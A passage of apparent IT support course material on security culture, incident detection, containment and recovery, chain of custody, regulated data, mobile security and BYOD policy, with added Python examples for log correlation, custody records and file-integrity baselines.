something isn't right is critical. 
It encourages them to do the right thing. 
To help create this context, it's important for 
employees to have a way that they can ask questions when they come up. 
This could be a mailing list where users can ask questions about security 
concerns or to report things they suspect are security risks. 
Having the designated communication channel where people can feel comfortable 
asking questions and getting clear answers back is super important. 
Helping others keep security in mind will help decrease the security burdens 
you'll have as an IT support specialist. 
It will also make the overall security of the organization better. 
Creating a culture that makes security a priority isn't easy. 
You have to reinforce and 
reward behaviors that boost the security of your organization. 
Think of the small things we do every day when we use our computers, 
just entering your password to log in or 
locking your screen when you walk away from your computer is helpful. 
Hopefully, you're careful about entering your password on websites and 
check the address of the site you're authenticating against. 
If you aren't, start doing so; checking the address bar is the simplest way 
to avoid entering your password into a fake website. 
When you're working on your laptop in a public space like a library or 
coffee shop, do you lock your screen when you leave to use the restroom or 
get another caffeine fix? 
If not, you absolutely should. 
Hopefully, you aren't leaving your computer unattended in public 
in the first place. 
That's a really bad idea. 
These are the types of small things that security training should address. 
You also need to justify why these are good behaviors to adopt. 
In some cases, the company culture can turn screen locking into a sort of game. 
When colleagues forget to lock their screen, 
other team members can play harmless pranks on them. 
The last time I forgot to lock my computer, 
my colleague changed the default language to Turkish. 
It reminded me to always lock my screen because anyone with access to the machine 
can impersonate you and get access to any resources you're logged into. 
But building a culture that embraces security principles isn't always enough. 
There are some things that all employees should know. 
This is when an occasional mandatory security training course can help. 
This could be a short video or informational presentation followed by 
a quiz to see if your employees understood the key concepts covered in the training. 
The quiz can also increase the chances of information being retained. 
Making employees retake the training once a year or so 
ensures that everyone is up to date on their training. 
You can also cover new concepts or updated policies when needed. 
This type of training should cover the most common attack types and 
how to avoid falling victim to them. 
This includes things like phishing emails and best practices around password use. 
These trainings often include scenarios that can help test the user's 
understanding of a particular topic. 
Training courses like these are the last in the line of defenses that you and 
your company need to have in place to make sure that you're as safe as possible for 
as long as possible.

QUALITY OF IT CANDIDATE

To have a successful career in IT 
there are several things that are needed. 
Tenacity, grit, being 
able to solve challenging problems. 
Again, not having all the knowledge 
to solve it but knowing how to get there. 
For me, a great IT support candidate 
or get a great IT candidate. 
Somebody that's not afraid to 
make mistakes is having that tenacity, 
being able to deal with some of the downsides 
because that is a big part 
of it is the learning part of it. 
That ability to look 
at something and say, this is something, 
even though it seems insurmountable, it seems huge, 
I can attack this in whatever small degrees and fix it. 
Very early on, I was interviewing for techs many years ago. 
I worked in a small space in downtown Ann Arbor and 
there was an alleyway in 
the back of our office and weird fire escape came on 
the second floor of 
his office and in was this fire escape 
leading up and I was 
waiting for an interview candidate to come in, 
somebody I had never met before. 
The receptionist comes up to me 
a few minutes later and tells 
me that the interview candidate was here. 
I sit down with a person I said, 
"You're the person that was 
escorted in a few minutes ago from the back" and he says, 
yeah, what had happened was he 
couldn't find the entrance of the building. 
Very complicated, [inaudible]. 
It was an odd building. It wasn't well-marked. 
The doors were hard to 
find a lot of people run into that. 
So he went around the back to this greasy alleyway. 
Here he was in a suit coming in for an interview. 
He climbed this rusty old fire escape 
banged on the backdoor to get in, 
and that had me sold right from the beginning. 
I'm like here's a problem, 
regardless of whether 
or not he was going to be a little bit 
dirty or sweaty or whatever he found a way to solve it. 
That's really what I look for. 
Again, for that level of tenacity 
where even if they struggled, 
sometimes I prefer that. 
This was hard for me, 
but I got through it and I was successful 
in the end. That's what I look for.

INCIDENT REPORTING

We try our best to protect our systems and networks, but 
it's pretty likely that some sort of incident will happen. 
This could be anything from a full system compromise and 
data theft to someone accidentally leaking a memo. 
Regardless of the nature of the incident, 
proper incident handling is important to understanding what exactly happened, 
how it happened and how to avoid it happening again. 
The very first step of handling an incident is detecting it in the first place. 
Hopefully, our intrusion detection systems caught the telltale signs of an ongoing 
attack and alerted us to the threat, but 
incidents can be brought to your attention in other ways too.

An employee may have noticed something suspicious and 
reported it to the security team for 
investigation, or maybe leaked information ended up in the news. 
However you found out about the incident, the next step is to analyze it and 
determine the effects and scope of damage. 
Was it a data leak or information disclosure? 
If so, what information got out? 
How bad is it? Were systems compromised? 
Which systems, and what level of access did the attacker manage to get? 
Is it a malware infection? 
What systems were infected? 
Some attacks are really obvious with very clear signs of an intrusion, like 
a defaced web page or unusual processes consuming all resources in the system. 
Others may be way more subtle and almost impossible to detect. 
Like a small change to a single system configuration file. 
This is why having good monitoring in place is so 
important along with understanding your baseline. 
Once you figure out what normal traffic looks like on your network and 
what services you expect to see, outliers will be easier to detect. 
This is important because every false lead that the incident response team has to 
investigate means time and resources wasted. 
This has the potential to allow real intrusions to go undetected and 
uninvestigated longer. 
During detection and scoping correlating data from different systems can reveal 
a much bigger picture of what's happened. 
It might show how an intruder gained access. 
For example, 
you could see a connection event logged by the firewall from a suspicious IP address. 
Searching for other events related to this IP address may reveal login attempts in 
the authentication logs for a system. 
This would provide insight into where the attacker is coming from and 
what they attempted to do on the network. 
The authentication logs would also indicate whether or 
not they were able to successfully log into an account. 
If so, that lets you know which account is compromised. 
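The pivot just described, as an added example in Python (not code from the course or from any IDS product): starting from one suspicious source address, pull the firewall events for that address, search the SSH authentication log for the same address, and build a single ordered timeline that also says which hosts were targeted, which accounts were tried and which logins succeeded. Both log formats and all of the sample records are constructed for this example; real syslog, firewall and SSO formats differ, so the two regular expressions are the part you would adapt.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed log formats (assumptions for this example):
#   firewall: "<iso-ts> fw: ACCEPT|DROP src=<ip> dst=<ip> dport=<port>"
#   sshd:     "<iso-ts> <host> sshd[<pid>]: Accepted|Failed password|publickey for
#              [invalid user ]<user> from <ip> port <n> ssh2"
FW_RE = re.compile(
    r"^(?P<ts>\S+) fw: (?P<action>ACCEPT|DROP) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)


def scope_incident(fw_lines: list[str], auth_lines: list[str], suspicious_ip: str) -> dict:
    """Pivot from one suspicious source IP across firewall and auth logs.

    Returns the internal hosts it touched, the accounts it tried, the logins that
    succeeded (these accounts must now be treated as compromised) and a merged,
    time-ordered view of both sources.
    """
    timeline: list[tuple[str, str, str]] = []
    targets: set[str] = set()
    for line in fw_lines:
        m = FW_RE.match(line)
        if m and m["src"] == suspicious_ip:
            timeline.append((m["ts"], "firewall", f"{m['action']} -> {m['dst']}:{m['dport']}"))
            targets.add(m["dst"])

    failed: dict[tuple[str, str], int] = defaultdict(int)
    compromised: set[tuple[str, str]] = set()
    for line in auth_lines:
        m = AUTH_RE.match(line)
        if not m or m["src"] != suspicious_ip:
            continue
        timeline.append((m["ts"], "auth", f"{m['result']} {m['user']}@{m['host']}"))
        if m["result"] == "Accepted":
            compromised.add((m["user"], m["host"]))
        else:
            failed[(m["user"], m["host"])] += 1

    timeline.sort()  # ISO-8601 timestamps in one zone sort correctly as strings
    return {
        "targets": sorted(targets),
        "failed_attempts": dict(failed),
        "compromised_accounts": sorted(compromised),
        "timeline": timeline,
    }


# Constructed sample records using documentation (TEST-NET) addresses, not real logs.
FW_SAMPLE = """\
2024-05-01T03:10:02 fw: ACCEPT src=198.51.100.23 dst=10.0.0.15 dport=22
2024-05-01T03:10:40 fw: DROP src=198.51.100.23 dst=10.0.0.16 dport=3389
2024-05-01T03:11:00 fw: ACCEPT src=192.0.2.77 dst=10.0.0.15 dport=443
""".splitlines()
AUTH_SAMPLE = """\
2024-05-01T03:10:05 web01 sshd[2211]: Failed password for invalid user admin from 198.51.100.23 port 50210 ssh2
2024-05-01T03:10:09 web01 sshd[2211]: Failed password for deploy from 198.51.100.23 port 50210 ssh2
2024-05-01T03:10:14 web01 sshd[2215]: Accepted password for deploy from 198.51.100.23 port 50222 ssh2
2024-05-01T03:12:00 web01 sshd[2230]: Accepted publickey for alice from 10.0.0.50 port 40110 ssh2
""".splitlines()

if __name__ == "__main__":
    result = scope_incident(FW_SAMPLE, AUTH_SAMPLE, "198.51.100.23")
    for ts, source, event in result["timeline"]:
        print(f"{ts}  {source:8s}  {event}")
    print("compromised:", result["compromised_accounts"])
```

In the sample the attacker is accepted through the firewall to port 22, fails twice, then succeeds as `deploy` on `web01`, and is dropped when probing RDP on a second host; the merged timeline shows that sequence at a glance, and `compromised_accounts` is the list to feed straight into the containment step (password reset, token revocation, session kill).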
Once the scope of the incident is determined, the next step is containment. 
You need to contain the breach to prevent further damage. 
For system compromises and malware infections, 
this is a pretty time-sensitive step. 
You don't want the malware or attacker to use one compromised machine to pivot 
to other machines inside your network. 
This could broaden the incident scope and cause even more damage. 
Containment strategies will vary depending on the nature of the incident. 
If an account was compromised, change the password immediately. 
If the owner is unable to change the password right away, 
then lock the account, and also revoke any long-lived authentication tokens, 
since the attacker may have one of those too. 
If it's a malware infection, can your anti-malware software quarantine or 
remove the infection? 
If not, the infected machine needs to be removed from the network as soon 
as possible to prevent lateral movement around the network. To do this, you can 
adjust network-based firewall rules to effectively quarantine the machine. 
You can also move the machine to a separate VLAN used for 
security quarantining purposes. 
This would be a VLAN with strict restrictions and 
filtering applied to prevent further infection of other systems and networks. 
It's important during this phase that efforts are made 
to avoid the destruction of any logs or forensic evidence. 
Attackers will usually try to cover their tracks by modifying logs and 
deleting files, especially when they suspect they've been caught. 
They'll take measures to make sure they keep their access to compromised systems. 
This could involve installing a backdoor or some kind of remote access malware. 
Another thing to watch out for is the attacker creating a new user account that 
they can use to authenticate in the future. 
With effective logging configurations and systems in place, 
these activities would show up in audit logs, 
so this type of access should be detected during an incident investigation. 
Then actions can be taken to remove that access. 
I hope I'm not scaring you with all these scenarios, but 
it's better to be safe than sorry. 
Another part of incident analysis is determining the severity, impact and 
recoverability of the incident. 
Severity includes factors like what and how many systems were compromised and 
how the breach affects business functions. 
An incident that's compromised a bunch of machines in the network would be more 
severe than one where a single web server was hacked. 
For example, you can imagine that the effort required to fix a large scale 
compromise would negatively affect the ability to do normal work. 
The impact of an incident is also an important issue to consider. If 
the organization only had one web server and it was compromised, 
it might be considered a much higher severity breach, since 
it would probably have a direct, externally visible impact on the business. 
Data exfiltration is the unauthorized transfer of data from a computer. 
It's also a very important concern when a security incident happens; 
hackers may try to steal data for a number of reasons. 
They may want to steal account information to gain access later. 
They may target business data to publish online to cause financial loss or 
damage to the organization's reputation. 
In some cases, the attacker may just want to cause damage and 
destruction, which might involve deleting or corrupting data. 
What actions the attacker has taken will affect the recoverability of the incident. 
Recoverability is how complicated and 
time consuming the recovery effort will be. 
An incident that can be recovered from with a simple restoration from backup by 
following documented procedures would be considered easily recoverable. 
But an incident where an attacker deleted large amounts of customer information and 
wreaked havoc across lots of critical infrastructure systems would be way more 
difficult to recover from. 
It might not be possible to recover from it at all. 
In some cases, depending on backup systems and configurations, 
some data may be lost forever and can't be restored. 
Backups won't contain any changes or 
new data that were made after the last backup run.

Incident Response
When you’ve had a data breach, you may need forensic analysis to analyze the attack. This analysis usually
involves extensive evidence gathering. This reading covers some considerations for protecting the integrity
of your forensic evidence and avoiding complications or issues related to how you handle evidence.

Regulated data

It’s important to consider the type of data involved in an incident. Many types of data are subject to
government regulations that require you to take extra care when handling it. Here are some examples
you’re likely to encounter as an IT support specialist.

1. Protected Health Information: This information is regulated by the Health Insurance Portability and
Accountability Act (HIPAA). It is personally identifiable health information that relates to:

- Past, present, or future physical or mental health or condition of an individual
- Administration of health care to the individual by a covered provider (for example, a hospital or
  doctor)
- Past, present, or future payment for the provision of health care to the individual

2. Credit Card or Payment Card Industry (PCI) Information: This is information related to credit, debit,
or other payment cards. PCI data is governed by the Payment Card Industry Data Security Standard (PCI
DSS), a global information security standard designed to prevent fraud through increased control of credit
card data.

3. Personally Identifiable Information (PII): PII is a category of sensitive information associated with a
person. Examples include addresses, Social Security Numbers, or similar personal ID numbers. 

4. Federal Information Security Management Act (FISMA) compliance: FISMA requires federal agencies
and those providing services on their behalf to develop, document, and implement specific IT security
programs and to store data on U.S. soil. For example, organizations like NASA, the National Institutes of
Health, the Department of Veterans Affairs, and any contractors processing or storing data for them, need
to comply with FISMA.

5. Export Administration Regulations (EAR) compliance: EAR is a set of U.S. government regulations
administered by the U.S. Department of Commerce’s Bureau of Industry and Security (BIS). These
regulations govern the export and re-export of commercial and dual-use goods, software, and technology.
Dual-use goods are items that can be used both for civilian and military applications. These goods are
heavily regulated because they can be classified for civilian use and then transformed for military
purposes.
Digital rights management (DRM) 

Digital Rights Management (DRM) technologies can help ensure compliance with data regulations. DRM
technology comes in the form of either software or hardware solutions. Both options allow content
creators to prevent deliberate piracy and unauthorized usage. DRM often involves using codes that prohibit
content copying or limit the number of devices that can access a product. Content creators can also use
DRM applications to restrict what users can do with their material. They can encrypt digital media so only
someone with the decryption key can access it. This gives content creators and copyright holders a way to:

- Restrict users from editing, saving, sharing, printing, or taking screenshots of content or products
- Set expiration dates on media to prevent access beyond that date or limit the number of times
  users can access the media
- Limit access to specific devices, Internet Protocol (IP) addresses, or locations, such as limiting
  content to people in a specific country

Organizations can use these DRM capabilities to protect sensitive data. DRM enables organizations to track
who has viewed files, control access, and manage how people use the files. It also prevents files from being
altered, duplicated, saved, or printed. DRM can help organizations comply with data protection
regulations.

End User Licensing Agreement (EULA)

End User Licensing Agreements (EULAs) are similar to DRM in specifying certain rights and restrictions that
apply to the software. You often encounter EULA statements when installing a software package, accessing
a website, sharing a file, or downloading content. A EULA is usually considered a legally binding agreement
between the owner of a product (e.g., a software publisher) and the product's end-user. The EULA specifies
the rights and restrictions that apply to the software, and it’s usually presented to users during installation
or setup of the software. You can’t complete an installation (or access, share, or download data) until you
agree to the terms written in the EULA statement.

Unlike DRM restrictions, EULAs are only valid if you agree to them (i.e., you check a box or click the ‘I Agree’
button). DRM restrictions don’t require your agreement—or rely on you to keep that agreement. DRM is
built into the product it protects, making it easier for content creators to ensure users do not violate
restrictions.

Chain of custody 

“Chain of custody” refers to a process that tracks evidence movement through its collection, safeguarding,
and analysis lifecycle. Maintaining the chain of custody makes it difficult for someone to argue that the
evidence was tampered with or mishandled. Your chain of custody documentation should answer the
following questions. Documentation for these questions must be maintained and filed in a secure location
for current and future reference.

• Who collected the evidence? Evidence can include the affected or used devices, media, and
  associated peripherals.
• How was the evidence collected, and where was it located?
• Who seized and possessed the evidence?
• How was the evidence stored and protected in storage? The procedures involved in storing and
  protecting evidence are called evidence-custodian procedures.
• Who took the evidence out of storage and why? Ongoing documentation of the names of
  individuals who check out evidence and why must be kept.

When a data breach occurs, forensic analysis usually involves taking an image of the disk. This makes a
virtual copy of the hard drive. The copy lets an investigator analyze the disk’s contents without modifying
or altering the original files. An alteration compromises the integrity of the evidence. This kind of
compromised integrity is what you want to avoid when performing forensic investigations. 
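The custody questions above, turned into a small record-keeping tool as an added example that is not part of the course material: each event names who handled the image, where, and why, and re-hashes the image so that a copy that no longer matches the acquisition hash cannot be silently passed along. The evidence id, names, paths and file contents are constructed sample values.

```python
"""Chain-of-custody log for a forensic disk image (added example; not from the course).

The reading lists the questions a custody record must answer: who collected the
evidence, how and where, who possessed it, how it was stored, and who checked it
out and why. It also notes that analysis is done on an image so the original is
never altered. This script records each custody event together with the SHA-256
of the image file and refuses to log a transfer if the image no longer matches
the hash taken at acquisition. All names, paths and contents are constructed.
"""
import hashlib
import json
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import List, Optional


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Hash the file in chunks so a multi-gigabyte image need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


@dataclass
class CustodyEvent:
    action: str        # collected, stored, checked_out, returned
    person: str        # who handled the evidence
    location: str      # where it was collected, stored or taken
    reason: str        # how it was collected/stored, or why it was checked out
    image_sha256: str  # hash observed when the event was recorded
    timestamp: str = field(
        default_factory=lambda: datetime.now(timezone.utc).isoformat()
    )


class CustodyLog:
    """Append-only custody record for one evidence image."""

    def __init__(self, evidence_id: str, image: Path):
        self.evidence_id = evidence_id
        self.image = image
        self.acquisition_sha256: Optional[str] = None
        self.events: List[CustodyEvent] = []

    def record(self, action: str, person: str, location: str, reason: str) -> CustodyEvent:
        """Log an event; every hand-off re-hashes the image and must match acquisition."""
        current = sha256_file(self.image)
        if self.acquisition_sha256 is None:
            self.acquisition_sha256 = current  # first event establishes the reference hash
        elif current != self.acquisition_sha256:
            raise ValueError(
                f"{self.evidence_id}: image hash {current[:12]}... does not match "
                f"acquisition hash {self.acquisition_sha256[:12]}...; custody broken"
            )
        event = CustodyEvent(action, person, location, reason, current)
        self.events.append(event)
        return event

    def verify(self) -> bool:
        """True if every logged event and the image on disk match the acquisition hash."""
        if self.acquisition_sha256 is None:
            return False
        if any(e.image_sha256 != self.acquisition_sha256 for e in self.events):
            return False
        return sha256_file(self.image) == self.acquisition_sha256

    def to_json(self) -> str:
        """Serialise for filing in the secure evidence record."""
        return json.dumps(
            {
                "evidence_id": self.evidence_id,
                "image": str(self.image),
                "acquisition_sha256": self.acquisition_sha256,
                "events": [asdict(e) for e in self.events],
            },
            indent=2,
        )


if __name__ == "__main__":
    import tempfile

    # Constructed stand-in for a disk image written by an imaging tool.
    image = Path(tempfile.mkdtemp()) / "ws17-disk.img"
    image.write_bytes(b"constructed image bytes " * 4096)

    log = CustodyLog("EV-0001-PLACEHOLDER", image)
    log.record("collected", "A. Analyst", "Office 2, workstation WS-17",
               "bit-for-bit image via write blocker")
    log.record("stored", "A. Analyst", "Evidence locker 3", "sealed bag, access logged")
    log.record("checked_out", "B. Analyst", "Forensics lab", "malware analysis")
    print(log.to_json())
    print("custody intact:", log.verify())
```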

Key takeaways:

Incident handling requires careful attention and documentation during an incident investigation's analysis
and response phases. 

• Be familiar with what types of regulated data may be on your systems and ensure proper
  procedures are in place to ensure your organization’s compliance.
• DRM technologies can be beneficial for safeguarding business-critical documents or sensitive
  information and helping organizations comply with data protection regulations.
• When incident analysis involves the collection of forensic evidence, you must thoroughly
  document the chain of custody.

INCIDENT RESPONSE AND RECOVERY

Once the threat has been detected and contained, it has to be removed or remediated. When it comes to malware infection, this means removing the malware from affected systems. But in some cases this may not be possible, so the affected systems have to be restored to a known good configuration. This can be done by rebuilding the machine or restoring from backup. Take care when removing malware from systems, because some malware is designed to be very persistent, which means it's resistant to being removed.

But before we can start the recovery, we have to contain the incident. This might involve shutting down affected systems to prevent further damage or spread of an infection. On the flip side of that, affected systems may just have network access removed to cut off any communication with the compromised system. Again, the motivating factor here would be to prevent the spread of any infection or to remove remote access to the system. The containment strategy varies depending on the nature of the affected system. Let's say a critical piece of networking infrastructure was compromised. A quick shutdown may not work since it would impact other business operations. On top of that, removing network access might trigger fail-safes in attack software or malware. Let's say a piece of malware is designed to periodically check in to a command and control server. Severing network communications with the infected host might cause the malware to trigger a self-destruct function in an attempt to destroy evidence.

Forensic analysis may need to be done to analyze the attack. This is especially true when it comes to a malware infection. In the case of forensic analysis, affected machines might be investigated very closely to determine exactly what the attacker did. This is usually done by taking an image of the disk, essentially making a virtual copy of the hard drive. This lets the investigator analyze the contents of the disk without the risk of modifying or altering the original files. If that happened, it would compromise the integrity of any forensic evidence. Usually evidence gathering is also part of the incident response process. This provides evidence to law enforcement if the organization wants to pursue legal action against the attackers. Forensic evidence is super useful for providing details of the attack to the security community. It allows other security teams to be aware of new threats and lets them better defend themselves.

It's also very important that you get members from your legal team involved in any incident handling plans. Because an incident can have legal implications for the company, a lawyer should be available to consult and advise on the legal aspects of the investigation. It's crucial in order to avoid complications or issues of liability. Members of the public relations team should also get involved, since these incidents can have an impact on a company's reputation.

There's another part of the cleanup and recovery phase I should call out. We'll need to use information from the analysis to prevent any further intrusions or infections. First, we determine the entry point to figure out how the attacker got in or what vulnerability the malware exploited. This needs to be done at the same time as the cleanup. If you remove the malware infection without also addressing the underlying vulnerability, systems could become re-infected right after you clean them up. Postmortems can be a great way to document incidents. The learnings from postmortems can be used to prevent those incidents from happening again.

If a critical system has been compromised, remediation can be complicated because of downtime during remediation and recovery. Logs have to be audited to determine exactly what the attacker did while they had access to the system. They'll also tell you what data the attacker accessed. Systems must be scrutinized to ensure no backdoors have been installed or malware planted on the system. Depending on the severity of the compromise or infection, it might be necessary to rebuild the system from the ground up. Cleanup will typically involve restoring from a backup point to a known good configuration. Infected or corrupted system files can be restored from known good copies.

Sometimes cleanup can be very simple and quick. I hope that's what you find more often than not. If a website was defaced, the attacker may have simply uploaded their defaced HTML file and pointed the web server at the new file. A configuration file change and deletion of the attacker's HTML file would undo those changes. Even so, efforts need to be made to determine how the attacker got access. That vulnerability should be closed to prevent any future attacks.

When all traces of the attack have been removed and discovered and the known vulnerabilities have been closed, you can move on to the last step. That's when systems need to be thoroughly tested to make sure proper functionality has been restored. Usually, affected systems would also remain under close watch, sometimes with additional detailed monitoring and logging enabled. This is to watch for any additional signs of an intrusion in case something was missed during the cleanup. It's also possible that the attacker will attempt to attack the same target again. There's a very high chance that they use the same or similar attack methodology on other targets in your network. It's important to incorporate the lessons you've learned from any incident into your overall security defenses. Update firewall rules and ACLs if an exposure was discovered in the course of the investigation. Create new definitions and rules for intrusion detection systems that can watch for the signs of the same attack again. Stay vigilant and prepared to protect your system from attacks. Remember that at some point, some security breach will happen; when it does, execute your plan to counter the breach.
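The cleanup step above restores files from known good copies and then checks the system for anything left behind. As an added example that is not part of the course material, the script below builds a SHA-256 baseline of a directory tree from the known good state and reports files that were modified, added or removed; the constructed sample mirrors the defaced-website case (a repointed web server config plus an extra HTML file). Paths, file names and contents are all constructed.

```python
"""Compare a restored system against a known-good baseline (added example; not from the course).

Builds a SHA-256 baseline of every regular file under a directory (taken from a
clean backup or rebuild), saves it as JSON, and later reports which files are
modified, added or removed relative to that baseline. Anything reported is a
lead to examine for planted files or backdoors before the system returns to
service. All sample paths and contents below are constructed.
"""
import hashlib
import json
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map each regular file (path relative to root) to its SHA-256."""
    baseline: Dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        # Symlinks are skipped: hashing the target would hide a swapped link.
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def save_baseline(baseline: Dict[str, str], dest: Path) -> None:
    """Persist the baseline outside the tree it describes."""
    dest.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src: Path) -> Dict[str, str]:
    return json.loads(src.read_text())


def compare_to_baseline(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Report modified, added and removed files relative to the baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def is_clean(report: Dict[str, List[str]]) -> bool:
    """True when the tree matches the baseline exactly."""
    return not any(report.values())


if __name__ == "__main__":
    import tempfile

    work = Path(tempfile.mkdtemp())
    site = work / "site"
    (site / "conf").mkdir(parents=True)
    (site / "html").mkdir()
    (site / "conf" / "httpd.conf").write_text("DirectoryIndex index.html\n")
    (site / "html" / "index.html").write_text("<h1>Artisanal widgets</h1>\n")

    # Baseline captured from the known-good state, stored outside the tree.
    save_baseline(build_baseline(site), work / "baseline.json")

    # Constructed defacement: config repointed and an extra HTML file dropped in.
    (site / "conf" / "httpd.conf").write_text("DirectoryIndex defaced.html\n")
    (site / "html" / "defaced.html").write_text("<h1>defaced</h1>\n")

    report = compare_to_baseline(site, load_baseline(work / "baseline.json"))
    for kind, paths in report.items():
        print(f"{kind}: {paths}")
    print("clean:", is_clean(report))
```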

MOBILE SECURITY AND PRIVACY

Keeping mobile devices secure is super important. Think about the kind of data that a mobile device can have: email, personal files, photos, health data, location data and so on. Mobile devices travel with us and they aren't protected by the same level of physical security as a server in a data center. Mobile devices are easily misplaced or stolen. So we need to be sure to secure these devices. As we go through this video, remember that many of the settings that we will discuss can be automatically configured or required by policy using mobile device management.

One of the most basic protections you can enable on a smartphone or tablet is a screen lock. A screen lock presents some kind of challenge that you have to respond to in order to unlock the device. You might enter a PIN or password, you might draw a pattern on screen, or you might use biometric data like a fingerprint or even your face to unlock the device. No protection is perfect, so we should use defense in depth to protect the data on your mobile devices. What if someone steals the device and reboots it or takes it apart to get at the storage directly? To help protect against this, enable storage encryption on your mobile devices. On some devices this is done by default, but if it isn't, you should enable that feature.

We've talked a little bit about protecting your device from an outside attacker. But what about protecting the data on your device from an app that's installed on your device? End users should be able to control which apps on their mobile device have access to what data. Let's look at how you can see which apps are using or have access to use specific types of private data on your device. Mobile operating systems have defined permissions that control which app has access to which systems or data. Each OS has a list of permissions, and the app requests access to the specific permissions that it needs. Mobile apps will request permission either when they are first installed or when they first try to use the permission. At times an end user might deny an app access to a permission that it needs, making that app unable to function properly. It might be up to you to help them troubleshoot app permissions.

For example, one permission controls access to information about the device's location. A mobile device can use its GPS, cellular networking and Wi-Fi networking to determine the location of the device. Determining the device's location uses a lot of battery power, and it's also very sensitive from a privacy point of view. Still, knowing the location of the device is critical for some apps. For example, obviously the app that you use for mapping and navigation needs to know where the device is. You can turn a mobile device's location services on and off. You can also use the app permission settings on your device to control which apps have access to location services when they are on. Let's take a look; here's how to do it in Android.

Here's a list of all the permissions that apps can request, and if I select one, I can see and control which apps have access to my device's location.

I can do the same thing in iOS and with other permissions. For example, let's check which apps have access to record sounds through the device's microphone. So here I have an iPhone. From the privacy settings, I can view all of the different categories of private data and control which apps have access to which data. If I select one, I can see and control which apps have access to my device's microphone. Android and iOS use different names for the types of permissions and private data that they can grant to apps, but the basics are the same.

Supplemental Readings for Mobile Security and Privacy

Check out the following links for more info:

• Set screen lock on an Android device
• Change access to items when iPhone is locked
• Use a passcode with your iPhone, iPad, or iPod touch
• Control your app permissions on Android 6.0 and up
• Change app access to private data

Bring Your Own Device (BYOD)

In this reading, you will learn about a business practice called “bring your own device” (BYOD), as well as
the security risks related to BYOD policies and how to mitigate these risks. Organizations can reduce IT
costs by limiting the number of company-owned mobile devices issued to employees. Instead, businesses
are passing on the costs of mobile devices and cellular services to employees by allowing employees to
bring their own devices for business use.  

Bring your own device (BYOD)

Traditionally, IT departments would provide mobile devices to employees for business use. This gave the IT
staff control over the security of those devices. Today, an increasing number of companies permit
employees to bring their own devices to work. This trend started with employees requesting permission to
carry a single smartphone rather than carrying one phone for work and one for personal use. Organizations
noticed the cost savings gained by allowing their employees to select their personal smartphones as the
single device. By using smartphones with dual SIM card slots or phone apps like Google Voice, users can
configure multiple phone lines on a single smartphone. However, BYODs can become dangerous security
threats to companies’ data and networks. IT departments do not have the same level of control over the
security of BYOD devices as they would with company-owned devices.

BYOD Threats

Some of the potential threats BYODs pose to company networks, resources, and data include:

• Loss or theft could result in an organization’s data being stolen or the lost device being used to
  gain unauthorized access to a company’s network.
• Data loss, including:
  1. Data leakage losses can happen when a computing device is lost or compromised; when an
     employee accidentally saves or sends confidential information to the wrong destination; when a
     disgruntled employee exposes data maliciously; or when viruses, malware, phishing attacks, etc.
     penetrate organizations’ networks.
  2. Data portability losses can occur when former employees take company data with them on their
     BYOD when they resign or are fired by the organization.
• Security vulnerabilities are any type of weakness in the security of a device or network that
  provides access for a threat to penetrate the system.
• Meddler in the middle attacks (MITM) occur when an attacker monitors the data transfers
  between two sources with the intent to copy and/or interfere with that information. One of the
  most common opportunities for an MITM attack arises when a mobile device accesses important
  information through a public Wi-Fi connection, such as at a hotel or restaurant.
• Malware is malicious software that can be used to steal, modify, or delete data. It can also be used
  to gain unauthorized access to a device or network.
• Jailbreaking happens when a manufacturer’s protective restrictions are removed on a mobile
  device. Without these restrictions, a device becomes vulnerable to the risk of the user unknowingly
  installing malicious software.

Solutions

To mitigate these threats, organizations and their IT departments should design security policies for BYOD
use inside company networks. Some preventative steps could include:

1. Develop a bring your own device (BYOD) policy: IT departments and organizations can create
written policies that detail the minimum technology requirements for permitted BYODs, provide
instructions for employees on how to properly secure their devices, and list the rules for safe data
access and storage. 
2. Use Mobile Device Management (MDM) software: MDM software can be used to enforce BYOD
policy requirements for mobile devices to help secure company data and networks. IT
departments can use MDM software to: 
a. Automatically install apps and updates, including antivirus and anti-malware software
b. Configure secure connections to an organization’s wireless networks 
c. Encrypt storage on devices
d. Require a lock screen and password
e. Remote wipe a mobile device that is lost or stolen
f. Block the execution of certain apps
g. Meet compliance standards
h. Prevent data being shared or stored in unauthorized locations
i. Manage devices remotely
3. Use an Enterprise Mobile Management (EMM) system: MDM policies are specific to mobile
operating systems. In order to distribute MDM policies across Android, iOS, and other mobile
operating systems, the BYODs can be enrolled through an Enterprise Mobility Management (EMM)
system.
4. Require the use of multi-factor authentication (MFA): Users can be authenticated by presenting
more than one method of identification. Some common identification factors include:
a. Something you know: a password or pin number
b. Something you have: a physical token, like an ATM or bank card, USB device, key fob, or
OTP (one-time password)
c. Something you are: biometric data, like a fingerprint, voice signature, facial recognition,
or retina scan 
d. Somewhere you are: location-dependent access, like a Global Positioning System (GPS)
location
e. Something you do: gestures, like swipe patterns; Turing tests, like CAPTCHA; or normal
patterns of behavior, like regular login and logout times 
5. Set an acceptable use policy (AUP): Organizations could create policies that set a code of conduct
for use of the companies’ data, systems, network, and other resources. 
6. Use non-disclosure agreements (NDA): Organizations can create legally binding contracts with
employees to assert the confidentiality and security policies for the companies’ data and
intellectual property. 
